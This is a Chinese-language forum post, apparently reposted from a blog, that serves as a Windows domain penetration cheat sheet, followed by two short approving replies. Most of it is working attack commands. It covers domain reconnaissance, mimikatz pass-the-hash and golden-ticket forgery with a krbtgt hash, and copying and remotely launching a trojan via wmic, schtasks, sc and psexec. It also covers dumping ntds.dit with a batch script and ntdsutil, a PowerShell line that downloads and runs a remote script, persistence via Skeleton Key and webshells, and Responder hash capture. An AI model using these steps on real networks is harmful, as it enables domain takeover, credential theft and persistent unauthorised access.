windows内网渗透杂谈

admin

域渗透

• 域信息收集
• 获取域权限
• dump域hash
• 权限维持
  

工作组渗透

• 常规内网渗透
• 各种欺骗攻击
  

---

域渗透域信息收集0x01
查询当前域信息

1. net view /domain
   
2. net config workstation
   
3. net group "Domain Admins" /domain
   
4. net time /domain
   
5. ipconfig /all
   
6. nslookup xxx
   
7. dsquery server
   
8. 
   
9. 查看域控制器
   
10. net group "Domain controllers"
    
11. 
    
12. 查询所有计算机名称(windows 2003)
    
13. 
    
14. dsquery computer
    
15. 
    
16. 下面这条查询的时候,域控不会列出
    
17. 
    
18. net group "Domain Computers" /domain

复制代码

还可以通过powershell进行信息搜集,收集的信息包括域控机器，网段信息，域内服务列表。使用powershell的话，首先要绕过默认的安全策略，具体看文章https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

PowerSploit\Recon\PowerView.ps1

powerview Get-NetDomainController 收集域控信息 具体的可以看看powerview的帮助文件 域内服务信息收集，在域环境中其实无需做端口扫描。直接通过SPN进行信息收集，具体脚本

1. PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices.ps1

复制代码

0x02域内权限获取

1.日常规服务，通过前面收集的服务信息，针对性跑这些服务。其中跑sqlserver弱口令比较好，跑出来了就可以执行命令。

2.抓密码 拿到一台域服务器后，首先加载mimikatz的powershell脚本将内置的信息抓取一遍，如果域管理员登录过的话，直接就获取到了域管权限。但是在windows2012后mimikatz抓不到明文了(包括打了KB2871997这个补丁的机器)，只能通过修改服务器上面的一些设置来获取，有完整的powershell利用脚本。 https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed

3.pass the hash 抓到密码破不出来就只能pth了，可以使用mimakatz

1. mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

复制代码

但是打了KB2871997这个补丁后常规的pth不能用了，只能传递administrator这个账号(sid=500),但是可以使用mimikatz任意传递aes256

4.steal token 当你获取了本地计算机的system权限后，如果这台机器上有域用户跑的进程，就直接可以窃取域账号的token，然后从本地用户组跨入域环境。如果这台机器上有域管的开的进程，那么直接steal token后就可以登录域控了。

5.远程执行命令方法

1. copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件

复制代码

WMIC远程运行命令

1. wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”

复制代码

powershell remoting 执行命令

schtasks计划任务远程运行

1. schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe
   
2. /sc once /st 00:00 /S host /RU System schtasks /run /tn foobar /S host
   
3. schtasks /F /delete /tn foobar /S host ##清除schtasks

复制代码

SC添加服务远程运行命令

1. sc \\host create foobar binpath=“c:\windows\temp\foobar.exe” ##新建服务,指向拷贝的木马路径
   
2. sc \\host start foobar ##启动建立的服务
   
3. sc \\host delete foobar ##完事后删除服务
   

复制代码

PStools 远程执行命令

1. psexec.exe \\ip –accepteula -u username -p password program.exe

复制代码

PTH+compmgmt.msc

smb+MOF

smbexec远程执行命令

1. copy execserver.exe \\host\c$\windows\
   
2. test.exe ip user password command netshare
   

复制代码

不推荐使用pstools，因为会留下很多痕迹，日志要记录，并且如果禁用NTLM那么psexec无法利用获得的ntlm hash进行远程连接

6.ms14068 && GPP ms14068 可以通过先执行klist purge 然后在用mimikatz注入证书 这样域用户也可以直接使用这个漏洞。 GPP漏洞介绍 http://www.91ri.org/14909.html

0x03 dump域内hash

1.非交互式 QuarkPwDump离线分析 需要文件：ntds.dit system.hiv 导出 system.hiv

1. reg save hklm\system system.hiv

复制代码

QuarksPwDump.exe -k 可以获取key

导出ntds.dit

连接到域控之后，上传bat 利用vshadow备份ntds.dit

1. setlocal
   
2. if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
   
3. set SOURCE_DRIVE_LETTER=%SystemDrive%
   
4. set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit
   
5. set DESTINATION_PATH=%~dp0
   
6. @echo ...Determine the scripts to be executed/generated...
   
7. set CALLBACK_SCRIPT=%~dpnx0
   
8. set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
   
9. @echo ...Creating the shadow copy...
   
10. "%~dp0vshadow-2008-x64.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%
    
11. del /f %TEMP_GENERATED_SCRIPT%
    
12. @goto :EOF
    
13. :IS_CALLBACK
    
14. setlocal
    
15. @echo ...Obtaining the shadow copy device name...
    
16. call %TEMP_GENERATED_SCRIPT%
    
17. @echo ...Copying from the shadow copy to the destination path...
    
18. copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%

复制代码

新建服务执行

1. sc create backupntds binPath= "cmd /c start c:\windows\temp\ntds.bat"
   
2. sc start backupntds
   
3. sc detele backupntds

复制代码

导出HASH

1. QuarksPwDump.exe -dhd -nt ntds.dit -sf system.hiv -o hash.txt

复制代码

ntdsutil导出

1. ntdsutil snapshot "activate instance ntds" create quit quit
   
2. ntdsutil snapshot "mount {GUID}" quit quit
   
3. copy MOUNT_POINT\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
   
4. ntdsutil snapshot "unmount {GUID}" quit quit
   
5. ntdsutil snapshot "delete {GUID}" quit quit

复制代码

powershell 导出ntds.dit

1. powershell IEX (New-ObjectNet.WebClient).DownloadString( 'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1');Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\Users\Administrator\Desktop\ntds.dit"

复制代码

powershell导出后需要修复一下

1. esentutl /p /o ntds.dit

复制代码

• 交互式
  

导出ntds.dit

windows2008之后可以使用ntdsutil

0x04权限维持

• golden ticket golden ticket 四要素
  

1. user 用户名
   
2. domain 域完整名称
   
3. sid   获取方式:whoami /all  powerview 里面的  Convert-NameToSid ESRINEA\administrator   psgetsid  -accepteula ESRINEA\administrator (PStoos存在)   mimikatz SID::lookup name
   
4. krbgt ntml hash   mimikatz “@lsadump::dcsync /domain:域完整名称 /user:krbtgt"

复制代码

保存golden ticket

1. mimikatz kerberos::golden /user:administrator /domain:ESRINEA.LOCAL /sid:S-1-5-21-2609584263-878513794-3710365111-500 /krbtgt:EDC094659D9C18F4E320C70838404D43 /ticket:ESRINEA.LOCAL.kirbi

复制代码

使用golden ticket

1. mimikatz keberos::ptt ESRINEA.LOCAL.kirbi

复制代码

• mimikatz Skeleton Key SSP Skeleton Key被安装在64位的域控服务器上，支持Windows Server2003—Windows Server2012 R2，能够让所有域用户使用同一个万能密码进行登录现有的所有域用户使用原密码仍能继续登录，重启后失效，使用mimikatz就可以安装。
• 记录域控密码 https://gist.github.com/mubix/6514311#file-evilpassfilter-cpp
• dump 域内所有hash
• 常用软件插后门 https://github.com/secretsquirrel/the-backdoor-factory
• cobalt-strike-persistence https://github.com/Tom4t0/cobalt-strike-persistence
• EXCHANGE服务器留webshell
• 控制一些vpn账号
• dump dns解析记录 dump ldap信息
  

工作组渗透常规内网渗透

• 日服务
• pass the hash
  

各种欺骗攻击

https://github.com/SpiderLabs/Responder 撸下内网一个网站挂上<img src=\\xxx\\xx>然后执行下面命令，就可以抓取ntlmv2 hash

1. ./Responder.py -I eth0 -rPv

复制代码

SMBRelay Attack

impacket

cobaltstrike工具免杀

cobaltstrike+veil

from:https://bl4ck.in/penetration/201 ... 9D%82%E8%B0%88.html

success95

总结的很详细，pwdumps抓取的很详细

WHILE

牛逼啊！很好的一篇文章。